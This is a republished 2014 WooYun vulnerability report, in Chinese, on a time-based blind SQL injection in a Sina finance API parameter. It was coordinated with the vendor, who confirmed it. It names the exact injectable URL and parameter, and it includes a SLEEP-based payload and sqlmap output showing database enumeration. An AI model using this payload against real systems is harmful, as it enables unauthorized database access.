新浪某站点SQL注射漏洞

2015年4月28日08:46:15评论347 views字数 199阅读0分39秒阅读模式

摘要

2014-07-14：细节已通知厂商并且等待厂商处理中
2014-07-15：厂商已经确认，细节仅向厂商公开
2014-07-25：细节向核心白帽子及相关领域专家公开
2014-08-04：细节向普通白帽子公开
2014-08-14：细节向实习白帽子公开
2014-08-28：细节向公众公开

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2014-68518

漏洞标题：新浪某站点SQL注射漏洞

漏洞作者： Manning

提交时间： 2014-07-14 22:58

公开时间： 2014-08-28 23:00

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql

0人收藏

漏洞详情

披露状态：

简要描述：

新浪某站点SQL注射漏洞

count = 1

详细说明：

接口参数未过滤

注入点：http://stock2.finance.sina.com.cn/licai/api/jsonp_v2.php/$cb/ProductRateService.getRateYear?type=AVG&seq=1&_=$rn

参数 seq

漏洞证明：

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: GET
 Parameter: seq
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: type=AVG&seq=1 AND SLEEP(5)&_=$rn
 ---
 [21:53:33] [INFO] testing MySQL
 [21:53:37] [CRITICAL] there is considerable lagging in connection response(s). P
 lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
 [21:54:07] [INFO] confirming MySQL
 [21:54:07] [WARNING] it is very important not to stress the network adapter duri
 ng usage of time-based payloads to prevent potential errors
 [21:55:07] [INFO] the back-end DBMS is MySQL
 web application technology: Apache
 back-end DBMS: MySQL >= 5.0.0
 [21:55:07] [INFO] fetching database names
 [21:55:07] [INFO] fetching number of databases
 [21:55:07] [INFO] retrieved: 3
 [21:56:38] [INFO] retrieved: inf
 
 [22:03:25] [ERROR] user aborted

修复方案：

过滤参数

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-07-15 12:10

厂商回复：

感谢关注新浪安全，马上联系相应开发进行处理

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-07-14 23:06 | ling ( 实习白帽子 | Rank:80 漏洞数:36 | 我是屌丝、我为自己代言。)

0

test

1# 回复此人
2014-07-15 10:12 | Manning ( 普通白帽子 | Rank:1181 漏洞数:144 | https://github.com/manning23/MSpider)

0

@xsser 新编辑完的审核下吧~~

2# 回复此人

漏洞概要 关注数(4) 关注此漏洞